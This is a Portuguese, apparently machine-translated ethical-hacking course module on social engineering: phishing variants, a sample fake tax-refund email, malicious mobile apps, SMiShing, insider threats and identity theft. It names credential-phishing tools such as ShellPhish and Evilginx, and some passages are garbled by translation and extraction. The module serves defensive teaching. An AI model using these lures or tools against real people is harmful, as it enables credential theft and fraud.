Os pop-ups enganam ou obrigam os usuários a clicar em um hiperlink que os redireciona para páginas da Web
falsas que solicitam informações pessoais ou baixam programas maliciosos, como keyloggers, trojans ou
spyware.
O método comum de induzir um usuário a clicar em um botão em uma janela pop-up é alertar sobre um
problema, como exibir um sistema operacional realista ou uma mensagem de erro de aplicativo, ou oferecer
serviços adicionais. Uma janela aparece na tela solicitando que o usuário faça login novamente ou avisando
sobre uma interrupção na conexão do host e que a conexão de rede precisa ser reautenticada. Quando o
usuário segue essas instruções, um programa malicioso é instalado, extrai as informações confidenciais do
alvo e as envia para o endereço de e-mail do invasor ou para um site remoto. Este tipo de ataque usa trojans
e vírus.
Exemplos de pop-ups usados para enganar os usuários:
Figura 5.1: Capturas de tela mostrando exemplos de janelas pop-up
ÿ Cartas Falsas
Uma farsa é uma mensagem alertando seus destinatários sobre uma ameaça inexistente de vírus de
computador. Ele depende da engenharia social para expandir seu alcance. Normalmente, os hoaxes não
causam nenhum dano físico ou perda de informações; mas causam perda de produtividade e usam os valiosos
recursos de rede de uma organização.
ÿ Correntes
Uma corrente é uma mensagem que oferece brindes, como dinheiro e software, com a condição de que o
usuário encaminhe o e-mail para um número predeterminado de destinatários.
Abordagens comuns usadas em cartas em cadeia são histórias emocionalmente convincentes, esquemas de
pirâmide de “enriquecimento rápido” , crenças espirituais e ameaças supersticiosas de má sorte ao
destinatário se ele “quebrar a corrente” e falhar em transmitir a mensagem ou simplesmente se recusar a leia
seu conteúdo As correntes também dependem da engenharia social para se espalhar.
ÿ Mensageiro de Chat Instantâneo
Um invasor conversa com usuários on-line selecionados por meio de mensagens instantâneas e tenta coletar
suas informações pessoais, como data de nascimento ou nome de solteira. Eles então usam as informações
adquiridas para invadir as contas dos usuários.

ÿ E-mail de Spam
Spam são e-mails irrelevantes, indesejados e não solicitados projetados para coletar informações financeiras,
como números de previdência social e informações de rede. Os invasores enviam mensagens de spam ao alvo
para coletar informações confidenciais, como dados bancários.
Os invasores também podem enviar anexos de e-mail com programas maliciosos ocultos, como vírus e trojans.
Os engenheiros sociais tentam ocultar a extensão do arquivo dando ao anexo um nome de arquivo longo.
ÿ Espantalho
Scareware é um tipo de malware que induz os usuários de computador a visitar sites infestados de malware ou
baixar ou comprar software potencialmente malicioso. O scareware é frequentemente visto em pop-ups que
informam ao usuário-alvo que sua máquina foi infectada por malware. Esses pop-ups aparecem de forma
convincente como se fossem provenientes de uma fonte legítima, como uma empresa de antivírus. Além disso,
esses anúncios pop-up sempre têm um senso de urgência e dizem à vítima para baixar rapidamente o software
se quiser se livrar do suposto vírus.

Engenharia social baseada em computador: phishing

Phishing é a prática de enviar um e-mail ilegítimo alegando ser de um site legítimo na tentativa de obter
informações pessoais ou de conta de um usuário
E-mails ou pop-ups de phishing redirecionam os usuários para páginas da Web falsas que imitam sites confiáveis,
que solicitam que eles enviem suas informações pessoais
De: info171581@inbox.net Para:

text@abc.com
CC:
Assunto: Aviso de Reembolso de Imposto !
Olá, Após os últimos cálculos anuais de sua atividade fiscal, determinamos

que você é elegível para receber uma restituição de imposto de US$ 800. Por favor ,
envie o pedido de reembolso de imposto e clique aqui para que seu reembolso de
imposto seja enviado para sua conta bancária no devido tempo.
Clique em "Começar" para que sua restituição de imposto seja enviada para sua
conta bancária, sua restituição de imposto será enviada para sua conta bancária no
devido tempo, reserve um tempo para consultar o banco que temos em nossa lista . Clicar no link direciona você para
ser atrasado por vários motivos, por exemplo, envio de registros inválidos ou inscriçãouma página da web fraudulenta que
após o prazo. se parece com uma página HMRC genuína
Cumprimentos
HM Revenue & Customs
http:// www.hmrc.gov.uk
Engenharia social baseada em computador: phishing (continuação)
Exemplos de e-mails de phishing
https:// its.tntech.edu

Engenharia social baseada em computador: phishing (continuação)

Tipos de Phishing
Spear Phishing
1
Um ataque de phishing direcionado direcionado a indivíduos específicos dentro de uma organização
caça à baleia
2
Um invasor visa executivos de alto nível, como CEOs, CFOs, políticos e celebridades que têm
acesso total a informações confidenciais e altamente valiosas
Agricultura
3
O invasor redireciona o tráfego da Web para um site fraudulento instalando um programa malicioso em um
computador ou servidor pessoal
Espumando
4
Uma variante de spam que explora plataformas de mensagens instantâneas para inundar o spam nas redes
Phishing
Phishing é uma técnica na qual um invasor envia um e-mail ou fornece um link falsamente alegando ser de um site
legítimo para obter informações pessoais ou de conta de um usuário. O invasor registra um nome de domínio falso,
cria um site semelhante e envia o link do site falso aos usuários. Quando um usuário clica no link do e-mail, ele o
redireciona para a página da Web falsa, onde é induzido a compartilhar detalhes confidenciais, como endereço e
informações de cartão de crédito.
Algumas das razões por trás do sucesso dos golpes de phishing incluem a falta de conhecimento dos usuários,
serem enganados visualmente e não prestarem atenção aos indicadores de segurança.
A captura de tela abaixo é um exemplo de um e-mail ilegítimo que afirma ser de um remetente legítimo. O link de
e-mail redireciona os usuários para uma página da Web falsa e solicita que eles enviem seus dados pessoais ou
financeiros.
Figura 5.2: captura de tela mostrando a técnica de phishing

Exemplos de e-mails de phishing

Fonte: https:// its.tntech.edu
Hoje, a maioria das pessoas usa internet banking. Muitas pessoas usam serviços bancários pela Internet para todas as
suas necessidades financeiras, como negociação de ações on-line e comércio eletrônico. O phishing envolve a
aquisição fraudulenta de informações confidenciais (como senhas e detalhes de cartão de crédito), disfarçando-se
como uma entidade confiável.
O alvo recebe um e-mail que parece ser do banco e solicita que o usuário clique na URL ou no
link fornecido. Se o usuário for enganado e fornecer seu nome de usuário, senha e outras
informações, o site encaminhará as informações ao invasor, que as usará para fins nefastos.
Figura 5.3: Captura de tela mostrando um e-mail de phishing

Figura 5.4: Captura de tela mostrando um e-mail de phishing
Figura 5.5: captura de tela mostrando um e-mail de phishing
Tipos de Phishing
ÿ Spear Phishing
Em vez de enviar milhares de e-mails, alguns invasores optam por “spear phishing” e usam conteúdo
especializado de engenharia social direcionado a um funcionário específico ou a um pequeno grupo de
funcionários de uma organização para roubar dados confidenciais, como informações financeiras e
segredos comerciais.
As mensagens de spear phishing parecem vir de uma fonte confiável com um site de aparência oficial.
O e-mail também parece ser de um indivíduo da empresa do destinatário, geralmente alguém em
posição de autoridade. Na realidade, a mensagem é enviada por um invasor tentando obter informações
críticas sobre um destinatário específico e sua organização, como credenciais de login, detalhes de
cartão de crédito, números de contas bancárias,

senhas, documentos confidenciais, informações financeiras e segredos comerciais. Spear phishing gera uma
taxa de resposta mais alta em comparação com um ataque de phishing normal, pois parece ser de uma fonte
confiável da empresa.
ÿ Baleação
Um ataque de baleia é um tipo de phishing que visa executivos de alto nível, como CEO, CFO, políticos e
celebridades que têm acesso total a informações confidenciais e altamente valiosas. É um truque de
engenharia social no qual o invasor engana a vítima para que ela revele informações corporativas e pessoais
críticas (como detalhes de contas bancárias, detalhes de funcionários, informações de clientes e detalhes de
cartão de crédito), geralmente por meio de falsificação de e-mail ou site. Whaling é diferente de um ataque
de phishing normal; o e-mail ou site usado para o ataque é cuidadosamente projetado, geralmente visando
alguém da liderança executiva.
ÿ Agricultura
Pharming é uma técnica de engenharia social na qual o invasor executa programas maliciosos no computador
ou servidor da vítima e, quando a vítima insere qualquer URL ou nome de domínio, redireciona
automaticamente o tráfego da vítima para um site controlado pelo invasor. Esse ataque também é conhecido
como “Phishing sem isca”. O invasor rouba informações confidenciais, como credenciais, dados bancários e
outras informações relacionadas a serviços baseados na web.
O ataque pharming pode ser realizado de duas maneiras: envenenamento do cache DNS e modificação do
arquivo host. Os ataques de pharming também podem ser executados usando malware como cavalos de Tróia
ou vermes.
ÿ Espumante
SPIM (Spam over Instant Messaging) explora plataformas de mensagens instantâneas e usa mensagens instantâneas
como uma ferramenta para espalhar spam. Uma pessoa que gera spam por mensagens instantâneas é chamada de Spimmer.
Spimmers geralmente usam bots (um aplicativo que executa tarefas automatizadas pela rede) para coletar
IDs de mensagens instantâneas e encaminhar mensagens de spam para eles.
Mensagens SPIM, como spam de e-mail, geralmente incluem anúncios e malware como anexo ou hiperlink
incorporado. O usuário clica no anexo e é redirecionado para um site malicioso que coleta informações
financeiras e pessoais, como credenciais, conta bancária e detalhes do cartão de crédito.

Ferramentas de Phishing
ShellPhish
Uma ferramenta de phishing usada para falsificar credenciais de usuários de várias PRETO
plataformas de redes sociais , como Instagram, Facebook, Twitter, LinkedIn, etc. https:// github.com
PhishX
https:// github.com
Modlishka
https:// github.com
Pegue
https:// github.com
Evilginx
https:// github.com
https:// github.com
Ferramentas de Phishing
As ferramentas de phishing podem ser usadas por invasores para gerar páginas de login falsas para capturar nomes
de usuário e senhas, enviar e-mails falsificados e obter o endereço IP e os cookies de sessão da vítima. Essas
informações podem ser usadas posteriormente pelo invasor, para representar um usuário legítimo e lançar novos
ataques à organização de destino.
ÿ ShellPhish
Fonte: https:// github.com
ShellPhish é uma ferramenta de phishing usada para falsificar credenciais de usuários de várias plataformas
de redes sociais, como Instagram, Facebook, Twitter e LinkedIn. Ele também exibe o endereço IP público do
sistema da vítima, informações do navegador, nome do host, geolocalização e outras informações.

Figura 5.6: captura de tela do ShellPhish
Figura 5.7: Captura de tela mostrando a saída do ShellPhish

Algumas ferramentas adicionais de phishing estão listadas abaixo:
ÿ PRETO (https:// github.com)

ÿ PhishX (https:// github.com)
ÿ Modlishka (https:// github.com)
ÿ Captura (https:// github.com)
ÿ Evilginx (https:// github.com)

Engenharia social baseada em dispositivos móveis:

Publicação de aplicativos maliciosos
ÿ Os invasores criam aplicativos maliciosos com recursos atraentes e nomes semelhantes

a aplicativos populares e os publicam nas principais lojas de aplicativos
ÿ Os usuários baixam esses aplicativos sem saber e são infectados por malware
que envia credenciais para invasores
O invasor
Cria aplicativo móvel publica aplicativos
malicioso móveis maliciosos
na loja de aplicativos
Atacante Jogos maliciosos Loja de aplicativos
Inscrição
O usuário baixa e instala

O aplicativo envia
as credenciais do o aplicativo móvel
usuário ao invasor malicioso
Do utilizador
Engenharia social baseada em dispositivos móveis
Publicação de aplicativos maliciosos
Na engenharia social baseada em dispositivos móveis, o invasor executa um ataque de engenharia social usando
aplicativos móveis maliciosos. O invasor primeiro cria o aplicativo malicioso – como um aplicativo de jogos com recursos
atraentes – e o publica nas principais lojas de aplicativos usando os nomes populares. Sem saber do aplicativo malicioso,
os usuários o baixam em seus dispositivos móveis, acreditando que seja genuíno. Depois que o aplicativo é instalado, o
dispositivo é infectado por um malware que envia as credenciais do usuário (nomes de usuário, senhas), detalhes de
contato e outras informações ao invasor.
Figura 5.8: Publicando aplicativos maliciosos


Reempacotando aplicativos legítimos
O desenvolvedor cria um Desenvolvedor malicioso
aplicativo de jogos e baixa um jogo legítimo e o reembala com
carrega na loja de aplicativos malware
Aplicativo móvel Malicioso

Armazenar Desenvolvedor
Envia credenciais de usuário Carrega o jogo para

para o malicioso uma loja de
desenvolvedor aplicativos de terceiros
Legítimo
Desenvolvedor
O usuário final baixa um
aplicativo de jogo malicioso
Do utilizador
Terceiro
Loja de aplicativos
Reempacotando aplicativos legítimos
Às vezes, o malware pode estar oculto em aplicativos legítimos. Um desenvolvedor legítimo cria aplicativos de jogos
legítimos. Os fornecedores de plataformas criam mercados centralizados para permitir que os usuários móveis
naveguem e instalem esses jogos e aplicativos de maneira conveniente. Normalmente, os desenvolvedores enviam
aplicativos de jogos para esses mercados, tornando-os disponíveis para milhares de usuários móveis. Um
desenvolvedor mal-intencionado baixa um jogo legítimo, reembala-o com malware e o carrega na loja de aplicativos
de terceiros. Depois que um usuário baixa o aplicativo malicioso, o programa malicioso instalado no dispositivo
móvel do usuário coleta as informações do usuário e as envia ao invasor.

Figura 5.9: Reempacotando aplicativos legítimos


Aplicativos de segurança falsos
O usuário faz logon em sua conta
bancária; aparecerá uma mensagem dizendo
ao usuário para baixar um aplicativo para o
telefone
Infecta o usuário
computador com malware
Credenciais do usuário
enviadas ao invasor
Atacante Do utilizador
Invasor carrega O usuário baixa o
aplicativo malicioso na loja de aplicativo da loja de

aplicativos aplicativos do invasor
App Store do invasor
Aplicativos de segurança falsos
Os invasores podem enviar um aplicativo de segurança falso para realizar engenharia social baseada em
dispositivos móveis. Nesse ataque, o invasor primeiro infecta o computador da vítima enviando algo malicioso.
Em seguida, eles carregam um aplicativo malicioso em uma loja de aplicativos. Quando a vítima faz login
em sua conta bancária, o malware no sistema exibe uma mensagem pop-up informando à vítima que ela
precisa baixar um aplicativo em seu telefone para receber uma mensagem da segurança. A vítima baixa o
aplicativo da loja de aplicativos do invasor, acreditando que está baixando um aplicativo original. Assim que
o usuário baixa o aplicativo, o invasor obtém informações confidenciais, como credenciais de acesso à conta
bancária (nome de usuário e senha), após o que uma segunda autenticação é enviada pelo banco à vítima
via SMS. Usando essas informações, o invasor acessa a conta bancária da vítima.

Figura 5.10: Aplicativos de segurança falsos

Social baseada em dispositivos móveis
Engenharia: SMiShing
(Phishing por SMS)
SMiShing (SMS phishing) é o ato de usar

Exemplo de SMiShing
Sistema de mensagens de texto SMS de
telefones celulares ou outros dispositivos móveis para
atrair os usuários para uma ação instantânea, Acha que é uma
CAIXA DE ENTRADA
mensagem real de
como baixar malware, visitar uma página maliciosa ou
Envia um SMS BANCO XIM banco xim
ligar para um número de telefone fraudulento Emergência!
Ligue para
08-7999-433
Tracy liga
para 08-7999-433
As mensagens SMiShing são geralmente Atacante
elaboradas para provocar uma ação instantânea

Uma gravação pede que ela forneça o número do cartão de
da vítima, exigindo que ela divulgue suas crédito ou débito. Tracy revela informações confidenciais
informações pessoais e detalhes da conta.
SMiShing (SMS Phishing)
O envio de SMS é outra técnica usada por invasores na execução de engenharia social baseada em dispositivos
móveis. No SMiShing (SMS Phishing), o sistema de mensagens de texto SMS é usado para induzir os usuários a
realizar ações instantâneas, como baixar malware, visitar uma página da Web maliciosa ou ligar para um número
de telefone fraudulento. As mensagens SMiShing são criadas para provocar uma ação instantânea da vítima,
exigindo que ela divulgue suas informações pessoais e detalhes da conta.
Considere Tracy, uma engenheira de software que trabalha em uma empresa de renome. Ela recebe um SMS
aparentemente do departamento de segurança do XIM Bank. Afirma ser urgente e a mensagem diz que Tracy deve
ligar para o número de telefone listado no SMS imediatamente. Preocupada, ela liga para verificar sua conta,
acreditando ser um número de telefone de atendimento ao cliente autêntico do XIM Bank. Uma mensagem gravada
pede que ela forneça o número do cartão de crédito ou débito, bem como a senha. Tracy acredita que é uma
mensagem genuína e compartilha informações confidenciais.
Às vezes, uma mensagem afirma que o usuário ganhou dinheiro ou foi selecionado aleatoriamente como um sortudo
vencedor e que precisa apenas pagar uma taxa nominal e compartilhar seu endereço de e-mail, número de contato
ou outras informações.
Figura 5.11: SMiShing (SMS Phishing)

Fluxo do módulo
01 03
Conceitos de Engenharia
e roubo de identidade
e suas Fases
04
Discutir ameaças internas e roubo de identidade

Atualmente, ameaças internas e roubo de identidade são grandes desafios para vários setores e
organizações. O principal motivo por trás de tais ataques é espionagem ou vingança; no entanto,
podem até ser causados pelo descuido dos funcionários. Este módulo discute conceitos relacionados
a ameaças internas e roubo de identidade.

Ameaças internas/ataques internos

ÿ Um insider é qualquer funcionário (pessoa ou pessoas de confiança) que tem acesso a ativos críticos de uma organização
ÿ Um ataque interno envolve o uso de acesso privilegiado para violar regras intencionalmente ou causar ameaças aos
informações ou sistemas de informação de qualquer forma
ÿ Esses ataques geralmente são executados por um usuário privilegiado, funcionário insatisfeito, funcionário demitido, funcionário sujeito
a acidentes , terceiros, equipe mal treinada, etc.
Exemplo de ataque interno: funcionário insatisfeito
Envia os dados para concorrentes

usando esteganografia
segredo da Empresa
Desapontado empresa Internet Concorrentes
Funcionário
Ameaças internas/ataques internos
Um insider é qualquer funcionário (pessoa de confiança) que tem acesso aos ativos críticos de uma organização. Um
ataque interno envolve o uso de acesso privilegiado para violar regras ou causar intencionalmente uma ameaça às
informações ou aos sistemas de informações da organização. Os insiders podem ignorar facilmente as regras de
segurança, corromper recursos valiosos e acessar informações confidenciais. Ataques internos podem causar grandes
prejuízos à empresa. Além disso, eles são perigosos porque são fáceis de lançar e difíceis de detectar.
Os ataques internos geralmente são executados por:
ÿ Usuários Privilegiados: Os ataques podem vir dos funcionários mais confiáveis da empresa, como gerentes e
administradores de sistemas, que têm acesso aos dados confidenciais da empresa e maior probabilidade de
uso indevido dos dados, intencionalmente ou não.
ÿ Funcionários insatisfeitos: os ataques podem vir de funcionários insatisfeitos ou contratados. Funcionários

descontentes, que pretendem se vingar da empresa, primeiro obtêm informações e depois esperam o momento
certo para comprometer os negócios da organização
Recursos.
ÿ Funcionários demitidos: Alguns funcionários levam consigo informações valiosas sobre a empresa quando são
demitidos. Esses funcionários acessam os dados da empresa após a rescisão usando backdoors, malware ou
suas credenciais antigas, se não estiverem desativados.
ÿ Funcionários propensos a acidentes: Se um funcionário acidentalmente perder seu dispositivo móvel, enviar
um e-mail para destinatários incorretos ou deixar um sistema carregado com dados confidenciais conectados,
isso pode levar à divulgação não intencional de dados.

ÿ Terceiros: terceiros, como funcionários remotos, parceiros, revendedores e fornecedores, têm acesso às
informações da empresa. No entanto, a segurança de seus sistemas é imprevisível e pode ser uma fonte de
vazamento de informações.
ÿ Funcionários mal treinados: um funcionário confiável torna-se um insider não intencional devido à falta de
treinamento em segurança cibernética. Eles falham em aderir às políticas, procedimentos, diretrizes e práticas
recomendadas de segurança cibernética.
As empresas nas quais os ataques internos são comuns incluem empresas de cartão de crédito, empresas de
assistência médica, provedores de serviços de rede, bem como provedores de serviços financeiros e de câmbio.
Exemplo de ataque interno: funcionário insatisfeito
A maioria dos casos de abuso interno pode ser atribuída a indivíduos introvertidos, incapazes de controlar o estresse,
em conflito com a gerência, frustrados com seu trabalho ou com a política do escritório, desejando respeito ou
promoção, transferidos, rebaixados ou emitidos um aviso de rescisão de contrato de trabalho, entre outros razões.
Funcionários descontentes podem passar segredos da empresa e propriedade intelectual para concorrentes para
ganho monetário, prejudicando assim a organização.
Funcionários insatisfeitos podem usar programas de esteganografia para ocultar segredos da empresa e,
posteriormente, enviar as informações aos concorrentes como uma mensagem de aparência inócua, como uma foto,
imagem ou arquivo de som, usando uma conta de e-mail comercial. Ninguém suspeita deles porque o invasor esconde
as informações confidenciais roubadas na foto ou no arquivo de imagem.
Figura 5.12: Exemplo de ataque interno — funcionário insatisfeito

Razões para ataques internos
Ganho financeiro Roubar dados Vingança

confidenciais
Torne-se futuro Realizar licitação do Público

concorrente concorrente anúncio
Razões para ataques internos
ÿ Ganho financeiro: um invasor realiza um ataque interno principalmente para obter ganhos financeiros. O
insider vende as informações confidenciais da empresa para seu concorrente, rouba os dados financeiros
de um colega para uso pessoal ou manipula os registros financeiros da empresa ou de seu pessoal.
ÿ Roubar Dados Confidenciais: Um concorrente pode infligir danos à organização-alvo, roubar informações
críticas ou até mesmo tirá-los do mercado apenas por encontrar uma vaga de emprego, preparar alguém
para passar na entrevista e contratar essa pessoa pelo concorrente.
ÿ Vingança: basta uma pessoa descontente para se vingar e a empresa fica comprometida. Os ataques podem
vir de funcionários insatisfeitos ou contratados com opiniões negativas sobre a empresa.
ÿ Torne-se um Futuro Competidor: Funcionários atuais podem planejar abrir seu próprio negócio concorrente
e, usando os dados confidenciais da empresa, esses funcionários podem acessar o sistema para roubar
ou alterar a lista de clientes da empresa.
ÿ Executar licitações de concorrentes: devido à espionagem corporativa, até mesmo os funcionários mais
honestos e confiáveis podem ser coagidos a revelar informações críticas da empresa por meio de suborno
ou chantagem.
ÿ Anúncio público: Um funcionário insatisfeito pode querer fazer uma declaração política ou social
declaração e assim vazar ou danificar os dados confidenciais da empresa.

Tipos de ameaças internas

Insider mal-intencionado
Um funcionário descontente ou demitido que rouba dados ou destrói as redes da empresa intencionalmente introduzindo malware na rede
corporativa
Insider negligente
Insiders que não foram instruídos sobre possíveis ameaças à segurança ou que simplesmente ignoram os
procedimentos gerais de segurança para atender à eficiência do local de trabalho
Especialista Profissional
Insiders nocivos que usam seu conhecimento técnico para identificar pontos fracos
e vulnerabilidades na rede da empresa e vender informações confidenciais a
concorrentes ou licitantes do mercado negro
Insider comprometido
Um insider com acesso a ativos críticos de uma organização que está

comprometido por um agente de ameaça externo
Tipos de ameaças internas
Existem quatro tipos de ameaças internas. Eles são:
ÿ Insider malicioso
Ameaças internas maliciosas vêm de funcionários descontentes ou demitidos que roubam dados ou
destroem redes da empresa intencionalmente ao injetar malware na rede corporativa.
ÿ Insider Negligente
Os insiders, que não são instruídos sobre possíveis ameaças à segurança ou simplesmente ignoram os
procedimentos gerais de segurança para atender à eficiência do local de trabalho, são mais vulneráveis a
ataques de engenharia social. Muitos ataques internos resultam da negligência do funcionário em relação
às medidas, políticas e práticas de segurança.
ÿ Insider Profissional
Insiders profissionais são os insiders mais prejudiciais. Eles usam seu conhecimento técnico para identificar
pontos fracos e vulnerabilidades na rede da empresa e vender as informações confidenciais da organização
para concorrentes ou licitantes do mercado negro.
ÿ Insider Comprometido
Um estranho compromete um interno que tem acesso aos ativos críticos ou dispositivos de computação de
uma organização. Esse tipo de ameaça é mais difícil de detectar, pois o estranho se disfarça como um
verdadeiro infiltrado.

Por que os ataques internos são eficazes?
Se uma atividade maliciosa for

detectada, o funcionário pode se
Ataques internos são fáceis de lançar
recusar a assumir a responsabilidade
e alegar que foi um erro
Prevenir ataques internos é difícil; um Os funcionários podem facilmente cobrir

atacante interno pode facilmente ter sucesso seus rastros
Diferenciar ações nocivas do

Pode passar despercebido por anos
trabalho regular do funcionário é muito
e a correção é muito cara
difícil
Por que os ataques internos são eficazes?
Os ataques internos são eficazes porque:
ÿ Ataques internos são fáceis de lançar.
ÿ É difícil prevenir ataques internos; um atacante interno pode facilmente ter sucesso.
ÿ
É muito difícil diferenciar ações nocivas do trabalho regular do empregado. É difícil identificar se os funcionários estão
realizando atividades maliciosas ou não.
ÿ Mesmo após a detecção de atividade maliciosa, o funcionário pode se recusar a aceitar a responsabilidade e alegar que
foi um erro.
ÿ
É fácil para os funcionários cobrir suas ações editando ou excluindo logs para ocultar suas atividades maliciosas.
ÿ Ataques internos podem passar despercebidos por anos e a correção é cara.

ÿ
É fácil para os insiders acessarem dados ou sistemas não relacionados à sua função de trabalho.
ÿ Insiders podem facilmente usar mal os recursos e roubar propriedade intelectual.
ÿ Insiders podem contornar restrições de segurança com esforço mínimo.
ÿ Pessoas de dentro podem facilmente obter segredos comerciais e expô-los a pessoas de fora.

Roubo de identidade
Roubo de identidade é um crime no qual

um impostor rouba suas informações de
identificação pessoal , como nome, número do
cartão de crédito, CPF ou carteira de motorista,
etc., para cometer fraude ou outros crimes
Os invasores podem usar o roubo de

identidade para se passar por funcionários
de uma organização-alvo e acessar
fisicamente as instalações
Roubo de identidade (continuação)
O invasor rouba a identidade das pessoas para fins fraudulentos, como:
Para abrir novas contas de cartão de crédito em nome do usuário

sem pagar as contas
Para abrir um novo telefone ou conta sem fio no nome do usuário
Para usar as informações das vítimas para obter serviços públicos ,

como eletricidade, aquecimento ou TV a cabo
Abrir contas bancárias com a intenção de passar cheques falsos

usando as informações da vítima
Clonar caixa multibanco ou cartão de débito para levantamentos eletrónicos

A criatividade é a chave do sucesso
das contas da vítima 05 neste ppt futuro e ensino primário.
Roubo de identidade
O roubo de identidade é um problema que muitos consumidores enfrentam hoje. Nos Estados Unidos, alguns
legisladores estaduais impuseram leis que restringem os funcionários de fornecer seus SSNs (números de seguridade
social) durante o recrutamento. O roubo de identidade frequentemente aparece nos noticiários. As empresas devem
ser informadas sobre roubo de identidade para que não coloquem em risco suas próprias iniciativas antifraude.

A Lei de Roubo de Identidade e Dissuasão de Assunção de 1998 define o roubo de identidade como o uso ilegal da identificação
de alguém. O roubo de identidade ocorre quando alguém rouba informações de identificação pessoal de outras pessoas para fins
fraudulentos. Os invasores obtêm ilegalmente informações de identificação pessoal para cometer fraudes ou outros atos criminosos.
Tipos de informações de identificação pessoal roubadas por ladrões de identidade:
ÿ Nome ÿ Número da conta bancária
ÿ Endereço residencial e comercial ÿ Dados do cartão de crédito
ÿ Número de Segurança Social ÿ Relatório de crédito
ÿ Telefone ÿ Número da carta de condução
ÿ Data de Nascimento ÿ Número do Passaporte
O invasor rouba a identidade das pessoas para fins fraudulentos, como:
ÿ Abrir novas contas de cartão de crédito em nome do utilizador sem pagar as contas
ÿ Para abrir um novo telefone ou conta sem fio em nome do usuário, ou para cobrar
sua conta existente
ÿ Para usar as informações das vítimas para obter serviços de utilidade, como eletricidade, aquecimento ou
TV a cabo
ÿ Abrir contas bancárias com a intenção de passar cheques falsos com o nome da vítima
em formação
ÿ Clonar caixa multibanco ou cartão de débito para fazer levantamentos eletrónicos na casa da vítima
contas
ÿ Para obtenção de empréstimos de responsabilidade do lesado
ÿ Para obtenção de carta de condução, passaporte ou outro documento de identificação oficial que contenha o nome da vítima
dados com as fotos do invasor
ÿ Utilizar o nome da vítima e número da Segurança Social para receber o seu governo
benefícios
ÿ Para se passar por um funcionário de uma organização de destino para acessar fisicamente suas instalações
ÿ Apoderar-se das apólices de seguros da vítima
ÿ Para vender informações pessoais da vítima
ÿ Para encomendar mercadorias online usando um drop-site
ÿ Para seqüestrar contas de e-mail
ÿ Para obtenção de serviços de saúde
ÿ Submeter declarações fiscais fraudulentas
ÿ Praticar outros crimes com intenção de fornecer o nome da vítima ao

autoridades durante a prisão, em vez de seus próprios

Tipos de roubo de identidade
roubo de identidade infantil 01 06 roubo de identidade médica
roubo de identidade criminal 02 07 Roubo de identidade fiscal
Clonagem de identidade e
roubo de identidade financeira 03 08
ocultação
Roubo de identidade da carteira

04 09 roubo de identidade sintética
de motorista
roubo de identidade de
Seguro roubo de identidade 05 10
segurança social
Tipos de roubo de identidade
O roubo de identidade está aumentando constantemente e os ladrões de identidade estão encontrando novas maneiras ou
técnicas para roubar diferentes tipos de informações de destino. Alguns dos tipos de roubo de identidade são os seguintes:
ÿ Roubo de Identidade Infantil
Este tipo de roubo de identidade ocorre quando a identidade de um menor é roubada. Isso é desejável porque
pode passar despercebido por muito tempo. Após o nascimento, os pais solicitam um Número de Previdência
Social para seus filhos, que junto com uma data de nascimento diferente, é usado por ladrões de identidade para
solicitar contas de crédito, empréstimos ou serviços públicos ou para alugar um lugar para morar e solicitar ao
governo benefícios.
ÿ Roubo de Identidade Criminal
Este é um dos tipos mais comuns e prejudiciais de roubo de identidade. Um criminoso usa a identidade de alguém
para escapar de acusações criminais. Quando são capturados ou presos, eles fornecem a identidade falsa. A
melhor maneira de se proteger contra o roubo de identidade criminal é manter todas as informações pessoais
seguras, o que inclui seguir práticas seguras na Internet e ser cauteloso com os “surfistas de ombro”.
ÿ Roubo de Identidade Financeira
Esse tipo de roubo de identidade ocorre quando a conta bancária ou as informações do cartão de crédito da vítima
são roubadas e usadas ilegalmente por um ladrão. Eles podem estourar um cartão de crédito e sacar dinheiro da
conta, ou podem usar a identidade roubada para abrir uma nova conta, solicitar novos cartões de crédito e fazer
empréstimos. As informações necessárias para invadir a conta da vítima e roubar suas informações são obtidas
por meio de vírus, ataques de phishing ou violação de dados.

ÿ Roubo de Identidade de Carta de Condução
Esse tipo de roubo de identidade é o mais fácil, pois requer um pouco de sofisticação. Uma pessoa pode perder sua
carteira de motorista ou ela pode ser facilmente roubada. Caso caia em mãos erradas, o criminoso pode vender a
carteira de habilitação roubada ou fazer uso indevido dela, cometendo infrações de trânsito, das quais a vítima
desconhece e não paga as multas, ficando com a habilitação suspensa ou cassada.
ÿ Seguro Roubo de Identidade
O roubo de identidade de seguro está intimamente relacionado ao roubo de identidade médica. Ocorre quando um
perpetrador se apropria ilegalmente das informações médicas da vítima para acessar seu seguro para tratamento
médico. Seus efeitos incluem dificuldades em liquidar contas médicas, prêmios de seguro mais altos e problemas
prováveis na aquisição de cobertura médica futura.
ÿ Roubo de Identidade Médica
Este é o tipo mais perigoso de roubo de identidade em que o perpetrador usa o nome ou as informações da vítima sem
o consentimento ou conhecimento da vítima para obter produtos médicos e reivindicar seguros de saúde ou serviços
de saúde. O roubo de identidade médica resulta em entradas errôneas freqüentes nos registros médicos da vítima, o
que pode levar a diagnósticos falsos e decisões com risco de vida por parte dos médicos.
ÿ Roubo de Identidade Fiscal
Esse tipo de roubo de identidade ocorre quando o perpetrador rouba o número do Seguro Social da vítima para registrar
declarações de impostos fraudulentas e obter restituições de impostos fraudulentas. Ele cria
dificuldades para a vítima em acessar seus reembolsos de impostos legítimos e resulta em perda de fundos. Os e-mails
de phishing são um dos principais truques usados pelo criminoso para roubar as informações de um alvo. Portanto, a
proteção contra tal roubo de identidade inclui a adoção de práticas seguras na Internet.
ÿ Clonagem e Ocultação de Identidades
Esse tipo de roubo de identidade abrange todas as formas de roubo de identidade, em que os perpetradores tentam se
passar por outra pessoa simplesmente para ocultar sua identidade. Esses perpetradores podem ser imigrantes ilegais,
aqueles que se escondem dos credores ou simplesmente aqueles que desejam se tornar “anônimos”.
ÿ Roubo de Identidade Sintética
Este é um dos tipos mais sofisticados de roubo de identidade, onde o criminoso obtém informações de diferentes
vítimas para criar uma nova identidade. Em primeiro lugar, ele rouba um número de seguro social e o usa com uma
combinação de nomes falsos, data de nascimento, endereço e outros detalhes necessários para criar uma nova
identidade. O perpetrador usa essa nova identidade para abrir novas contas, empréstimos, cartões de crédito, telefones,
outros bens e serviços.

ÿ Furto de Identidade da Segurança Social
Este é outro tipo comum de roubo de identidade em que o perpetrador rouba o número de seguro social da vítima
para obter vários benefícios, como vendê-lo a uma pessoa sem documentos, usá-lo para fraudar o governo obtendo
uma nova conta bancária, empréstimos, cartões de crédito ou solicitar e obter um novo passaporte.

Fluxo do módulo
01 03
e suas Fases
04
Discutir contramedidas de engenharia social

Os engenheiros sociais exploram o comportamento humano (como boas maneiras, entusiasmo pelo trabalho,
preguiça ou ingenuidade) para obter acesso aos recursos de informações da empresa-alvo. É difícil se proteger
